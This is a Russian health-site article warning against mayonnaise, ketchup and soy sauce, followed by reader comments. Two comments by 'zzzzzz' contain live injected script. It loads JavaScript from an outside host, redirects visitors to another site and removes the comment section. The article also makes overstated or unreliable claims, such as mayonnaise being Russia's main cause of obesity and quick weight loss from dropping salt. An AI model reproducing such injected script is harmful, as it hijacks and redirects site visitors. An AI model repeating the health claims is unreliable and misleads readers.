Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Худшие соусы  >>  Худшие соусы
 
Обратная связь
 

Худшие соусы

Размер шрифта
23 января 2014 00:00
  • google_analytics: false
  • Нравится

Про какие продукты мы чаще всего забываем, если хотим правильно питаться? На что мы не обращаем внимания, хотя мечтаем похудеть?

Худшие соусы

Это соусы и приправы, которые вы, наверняка, добавляете в пищу каждый день. Всего одна-две ложки соуса могут превратиться в метаболический кошмар, который приведет к развитию необратимых изменений в органах и системах всего организма! 

Майонез

Главной причиной ожирения в России является майонез. Лишний вес, в свою очередь, часто влечет за собой такие проблемы, как диабет, патологии репродуктивной системы, инсульты, инфаркты. Самые опасные жиры в майонезе – это транс-жиры. Они получаются в результате обработки растительного масла. Именно эти жиры и ответственны за образование смертельно-опасных бляшек, которые приводят к инфарктам и инсультам.

Кроме того, в майонез часто добавляют сахар, что только увеличивает его калорийность.

Кетчуп

В составе этого соуса отмечается высокая концентрация кукурузного сиропа и фруктозы. Одна столовая ложка кетчупа содержит четыре грамма сахара. Большинство людей в течение дня добавляют кетчуп к основным блюдам, даже не задумываясь. Не обольщайтесь, если на этикетке будет написано: «Без сахара» или «Органический кетчуп», так как в их состав все равно входит сахар или его аналоги.

Соевый соус

Всем известно, что соевый соус соленый. Но в чем же заключается основная опасность соли? Можно выделить два основных последствия ее чрезмерного употребления.

Во-первых, это давление. Соль задерживает воду в сосудах, из-за чего крови становится больше, давление на стенки сосудов увеличивается, и они могут просто не выдержать и лопнуть.

Во-вторых, соль ведет к лишнему весу. Механизм тот же самый: соль задерживает жидкость не только в сосудах, но и в тканях. Исключив из рациона соль, вы можете похудеть на несколько килограмм всего за неделю!

Выбирайте правильные соусы и читайте наш специальный проект «Сбрось лишнее»!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - zzzzzz

30 июня 2015 в 18:48

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

2 - zzzzzz

30 июня 2015 в 22:47

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
Не психуй! Взрывы гнева увеличивают шансы инфаркта!   Как угробить свое сердце?!   10 ужасов недосыпа   Добавки с витамином В спасают от инсульта  
17 июля 2013Куда смотреть, чтобы мозг заработал? А заодно спасти близкого от инсульта 22 июня 2013Грецкие орехи спасут от инфаркта
 
20 июня 2013Собака спасет от инфаркта! Какую породу завести, чтобы не умереть 18 июня 2013Повезло, живете в пешей доступности от шоссе? Не так быстро! Чем ближе к шоссе, тем больнее почки! Как защитить себя?
 

Слайдшоу

1
Зачем спать 10 затем
Чем страшен диабет?
9 продуктов, которые сделают вас худой в Новом году

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Как устроены волосы человека?
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.